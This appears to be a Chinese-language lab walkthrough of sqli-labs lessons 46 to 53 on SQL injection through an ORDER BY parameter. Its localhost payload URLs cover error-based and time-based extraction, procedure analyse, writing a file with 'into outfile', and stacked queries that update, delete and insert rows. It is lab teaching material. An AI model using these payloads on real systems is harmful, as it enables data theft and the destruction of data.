less-46-47-48-49-50-51-52-53

LESS-46
1、order by的原理为排序，所以通过sort+asc或desc的输出是否相同便可知是否有使用到排序（ASC 代表结果会以由小往大的顺序列出，而 DESC 代表结果会以由大往小的顺序列出。如果两者皆没有被写出的话，那我们就会用 ASC。）

输入？Sort=1 desc
输入：？Sort=1 asc
两者不同说明这里使用了order by
1、报错注入
输入：http://127.0.0.1/sqlilabs/Less-46/?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ ),0x7e))–+
2、延时注入：http://127.0.0.1/sqlilabs/Less-46/?sort=1 and if(ascii(substr(database(),1,1))=115,1,sleep(5))–+
（2）利用 procedure analyse 进行注入
procedure analyse 参数后注入，利用 procedure analyse 参数，我们可以执行报错注入。同时，在 procedure analyse 和 order by 之间可以存在 limit 参数，
输入：http://127.0.0.1/sqlilabs/Less-46/?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)
（3）输出导入导出
：http://127.0.0.1/sqlilabs/Less-46/?sort=1 into outfile “c://phpStudy//PHPTutorial//www//sqlilabs//Less-46//bb.txt”%23
Less-47

与上一题不同的是sql语句中有单引号闭合。
（1）报错注入
输入：http://127.0.0.1/sqlilabs/Less-47/?sort=1’ and extractvalue(1,concat(0x7e,(select database()),0x7e))–+（2）延时注入
输入：http://127.0.0.1/sqlilabs/Less-47/?sort=1’ and if(ascii(substr(database(),1,1)) =115,0,sleep(5))–+
（3）procedure analyse输入：http://127.0.0.1/sqlilabs/Less-47/?sort=1’ %20%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)–+
LESS-48
本关与LESS-46相似但是没有报错输出，故不能用报错注入，其他相同，不详写

（1）延时注入
http://127.0.0.1/sqlilabs/Less-48/?sort=1 and if(ascii(substr(database(),1,1))=115,0,sleep(5))–+
LESS-49
本题与47题相似但是没有报错注入，不详写LESS-50

执行 sql 语句我们这里使用的是 mysqli_multi_query()函数，而之前我们使用的是 mysqli _query()，区别在于 mysqli_multi_query()可以执行多个 sql 语句，而 mysqli_query()只能执行一个 sql 语句，那么我们此处就可以执行多个 sql 语句进行注入，也就是我们之前提到的 statcked injection。 (可参考38题解释)

（1）输入：http://127.0.0.1/sqlilabs/Less-50/?sort=1 ; update food set username=‘world’ where id=2 --+Less-51

与上一题的区别为这里为单引号闭合
输入：http://127.0.0.1/sqlilabs/Less-51/?sort=1’ ; delete from food where id=‘3’–+LESS-52
此处与less-50的区别为，这里没有报错输出
输入：http://127.0.0.1/sqlilabs/Less-52/?sort=1 ; insert into food(id,price,username) values (3,40,‘feel’)–+Less-53
这里和51题的区别为，虽都为单引号闭合但是此处没有报错输出；
Less-53
这里和51题的区别为，虽都为单引号闭合但是此处没有报错输出；
输入：http://127.0.0.1/sqlilabs/Less-53/?sort=1’ ; create table hello like users;